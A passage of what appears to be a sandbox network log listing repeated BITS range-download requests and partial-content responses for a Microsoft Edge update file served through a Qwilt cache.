                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:05 GMT
                Content-Type: application/octet-stream
                Content-Length: 341321
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8a9abd-2915334016-49
                Ocn-Served-By: QLT
                Content-Range: bytes 6539225-6880545/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=6880546-7066539
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:06 GMT
                Content-Type: application/octet-stream
                Content-Length: 185994
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8ac9ea-2915334016-50
                Ocn-Served-By: QLT
                Content-Range: bytes 6880546-7066539/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=7066540-7264352
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:07 GMT
                Content-Type: application/octet-stream
                Content-Length: 197813
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8ae5be-2915334016-51
                Ocn-Served-By: QLT
                Content-Range: bytes 7066540-7264352/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=7264353-7638129
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:09 GMT
                Content-Type: application/octet-stream
                Content-Length: 373777
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8b1874-2915334016-52
                Ocn-Served-By: QLT
                Content-Range: bytes 7264353-7638129/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=7638130-8243212
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:22 GMT
                Content-Type: application/octet-stream
                Content-Length: 605083
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8c864e-2915334016-53
                Ocn-Served-By: QLT
                Content-Range: bytes 7638130-8243212/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=8243213-8666904
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:45 GMT
                Content-Type: application/octet-stream
                Content-Length: 423692
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8f0f52-2915334016-54
                Ocn-Served-By: QLT
                Content-Range: bytes 8243213-8666904/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=8666905-9124577
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:46 GMT
                Content-Type: application/octet-stream
                Content-Length: 457673
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8f1c64-2915334016-55
                Ocn-Served-By: QLT
                Content-Range: bytes 8666905-9124577/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=9124578-9663748
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:47 GMT
                Content-Type: application/octet-stream
                Content-Length: 539171
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8f3838-2915334016-56
                Ocn-Served-By: QLT
                Content-Range: bytes 9124578-9663748/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=9663749-10121335
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:48 GMT
                Content-Type: application/octet-stream
                Content-Length: 457587
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8f695a-2915334016-57
                Ocn-Served-By: QLT
                Content-Range: bytes 9663749-10121335/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=10121336-10650340
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:51 GMT
                Content-Type: application/octet-stream
                Content-Length: 529005
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8facf6-2915334016-58
                Ocn-Served-By: QLT
                Content-Range: bytes 10121336-10650340/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=10650341-10988687
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:52 GMT
                Content-Type: application/octet-stream
                Content-Length: 338347
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8fcf6b-2915334016-59
                Ocn-Served-By: QLT
                Content-Range: bytes 10650341-10988687/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=10988688-11647275
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:54 GMT
                Content-Type: application/octet-stream
                Content-Length: 658588
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c900471-2915334016-60
                Ocn-Served-By: QLT
                Content-Range: bytes 10988688-11647275/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=11647276-12388150
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:55 GMT
                Content-Type: application/octet-stream
                Content-Length: 740875
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9016ac-2915334016-61
                Ocn-Served-By: QLT
                Content-Range: bytes 11647276-12388150/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=12388151-13148770
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:55 GMT
                Content-Type: application/octet-stream
                Content-Length: 760620
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
